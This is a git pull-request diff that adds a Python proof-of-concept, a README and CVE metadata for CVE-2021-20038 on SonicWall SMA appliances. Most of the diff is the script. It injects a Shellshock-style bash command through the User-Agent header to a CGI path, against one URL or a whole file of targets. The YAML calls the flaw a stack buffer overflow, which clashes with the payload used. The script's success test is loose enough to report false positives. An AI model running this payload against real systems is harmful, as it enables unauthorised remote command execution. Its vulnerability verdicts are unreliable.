Pre Merge pull request !451 from torsan/Feat_cve_2021_20038

2023-05-09 13:00:05 +00:00 · 2023-05-09 13:00:05 +00:00 · 341b67f390
parent f3f73c4050 3d22614166
commit 341b67f390
4 changed files with 99 additions and 0 deletions
--- a/cve/SonicWall/2021/CVE-2021-20038/CVE-2021-20038.py
+++ b/cve/SonicWall/2021/CVE-2021-20038/CVE-2021-20038.py
@ -0,0 +1,68 @@
+import requests
+import urllib3
+import sys
+from urllib import parse
+
+
+requests.packages.urllib3.disable_warnings()
+
+def banner():
+	print('baby test')
+
+def help():
+	print(' SonicWall RCE -h 查看帮助  ')
+	print(' SonicWall RCE -u 输入待检测url  ')
+	print(' SonicWall RCE -f 输入待检测文件  ')
+
+def poc(url):
+	path="/cgi-bin/jarrewrite.sh"
+	vulnurl=url + path
+	#print(vulnurl)
+	headers = {
+    "User-Agent": "() { :; }; echo ; /bin/bash -c id",      
+}
+	try:
+		res=requests.get(vulnurl,headers=headers,verify=False,timeout=5)
+		if "id" in res.text and res.status_code==200:
+			print(res.text+url+"is vuln 漏洞存在")
+		else:
+			print(url+"is not vuln 漏洞不存在")
+	except Exception as e:
+		print(e)
+
+def poc1(files):
+	for url in open(files):
+		url=url.strip()
+		path="/cgi-bin/jarrewrite.sh"
+		vulnurl=url + path
+		#print(vulnurl)
+		headers = {
+        "User-Agent": "() { :; }; echo ; /bin/bash -c id",      
+    }
+		try:
+			res=requests.get(vulnurl,headers=headers,verify=False,timeout=5)
+			if "id" in res.text and res.status_code==200:
+				print("[*] "+res.text+url+"is vuln 漏洞存在")
+			else:
+				print("[*] "+url+"is not vuln 漏洞不存在")
+		except Exception as e:
+			print(e)
+
+if __name__ == '__main__':
+    try:
+    	banner()
+    	print('by baby')
+    	cmd1=sys.argv[1]
+
+    	if cmd1=='-h':
+    		help()
+    	elif cmd1=='-u':
+    		cmd2=sys.argv[2]
+    		poc(cmd2)
+    	elif cmd1=='-f':
+    		cmd2=sys.argv[2]
+    		poc1(cmd2)
+    	else:
+    		print("请输入正确参数，或者-h查看帮助")
+    except:
+    	print("输入-h查看帮助")
--- a/cve/SonicWall/2021/CVE-2021-20038/README.md
+++ b/cve/SonicWall/2021/CVE-2021-20038/README.md
@ -0,0 +1,9 @@
+# SonicWallSSL-VPN_RCE
+CVE-2021-20038
+
+命令行传参
+-h 查看帮助
+-u 指定url
+-f 指定file文件 
+
+file内部的格式需添加http/https头
--- a/cve/SonicWall/2021/yaml/CVE-2021-20038.yaml
+++ b/cve/SonicWall/2021/yaml/CVE-2021-20038.yaml
@ -0,0 +1,20 @@
+id: CVE-2021-20038
+source: https://github.com/vesperp/CVE-2021-20038-SonicWall-RCE
+info:
+  name: 
+    SonicWall安全移动接入(SMA)系列解决方案简化了端到端安全远程访问, 可跨本地, 云和混合数据中心访问托管的资源, 对应用程序实施策略访问控制, 在用户和设备标识之间建立信任关系, 之后可对应用进行多层安全控制, 让用户可随时随地安全工作.
+  severity: critical
+  description: 
+    A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
+  scope-of-influence:
+    SMA 200, 210, 400, 410 and 500v firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20038#match-7894400
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-20038
+    cwe-id: CWE-787, CWE-121
+    cnvd-id: None
+    kve-id: None
+  tags: cve2021, Apache, RCE
--- a/other_list.yaml
+++ b/other_list.yaml
@ -40,6 +40,8 @@ cve:
  apache-Struts:
    - CVE-2017-9805
    - CVE-2018-11776
+  SonicWall:
+    - CVE-2021-20038
  unzip:
    - CVE-2022-0529
  django: